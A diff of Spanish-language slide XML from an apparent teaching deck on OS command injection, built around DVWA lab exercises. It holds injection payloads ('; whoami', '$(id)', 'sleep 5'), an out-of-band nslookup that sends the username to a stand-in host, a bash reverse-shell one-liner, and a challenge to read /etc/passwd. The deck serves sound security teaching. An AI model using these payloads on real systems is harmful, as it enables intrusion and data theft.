-              <a:t>•  En DVWA → Command Injection, envía una IP normal (127.0.0.1) y observa el ping.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Encadena un comando: 127.0.0.1; whoami y verifica que se ejecuta.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Prueba otros separadores: | id, &amp;&amp; uname -a, $(id).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Para command injection ciega (sin output), confirma con tiempo: 127.0.0.1; sleep 5.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Alternativa OOB: 127.0.0.1; nslookup $(whoami).tu-collaborator y observa la interacción DNS.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  En un lab aislado, lanza una reverse shell hacia tu netcat:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  127.0.0.1; bash -c 'bash -i &gt;&amp; /dev/tcp/10.0.0.5/4444 0&gt;&amp;1'</a:t>
+              <a:t>•  Término — Definición concisa</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Inyección de comandos — Entrada del usuario ejecutada como comando del sistema</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  RCE — Ejecución remota de código; el impacto de esta clase</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Shell del sistema — Intérprete al que llega la entrada sin controlar</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Metacaracter — ; &amp;&amp; backtick $() y la barra vertical; encadenan o sustituyen comandos</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  system() / exec() — Funciones que pasan una cadena a la shell; la causa raíz</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Inyección ciega — El comando se ejecuta pero no se ve la salida</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4539,7 +4930,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>✍️ Ejercicios</a:t>
+              <a:t>🧰 Herramientas y preparación</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4577,82 +4968,37 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Enumera 5 metacaracteres distintos y en qué se diferencian al encadenar.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Confirma una inyección ciega solo con retardo temporal.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Adapta un payload de Linux a su equivalente en Windows (&amp;, %COMPUSER%).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Explica la diferencia entre command injection y argument injection.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Escribe la versión segura en Python usando subprocess con lista de argumentos (sin shell=True).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Diseña una allowlist para un campo que solo debe aceptar una IP.</a:t>
+              <a:t>•  DVWA (Command Injection) y PortSwigger labs de OS command injection.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Burp para editar peticiones.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  netcat para escuchar la reverse shell en tu propia máquina de laboratorio.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4703,7 +5049,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📝 Reto verificable</a:t>
+              <a:t>🧪 Laboratorio guiado</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4741,22 +5087,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Consigue ejecución de comandos en DVWA nivel Medium (que filtra algunos caracteres) evadiendo el filtro, y demuestra el acceso listando /etc/passwd.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Criterio de aceptación: entregas el payload que evade el filtro, la evidencia de lectura de /etc/passwd y la corrección de código que eliminaría la vulnerabilidad.</a:t>
+              <a:t>•  En DVWA → Command Injection, envía una IP normal (127.0.0.1) y observa el ping.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Encadena un comando: 127.0.0.1; whoami y verifica que se ejecuta.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Prueba otros separadores: | id, &amp;&amp; uname -a, $(id).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Para command injection ciega (sin output), confirma con tiempo: 127.0.0.1; sleep 5.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Alternativa OOB: 127.0.0.1; nslookup $(whoami).tu-collaborator y observa la interacción DNS.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  En un lab aislado, lanza una reverse shell hacia tu netcat:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Documenta cada payload, la evidencia y el nivel de acceso obtenido.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
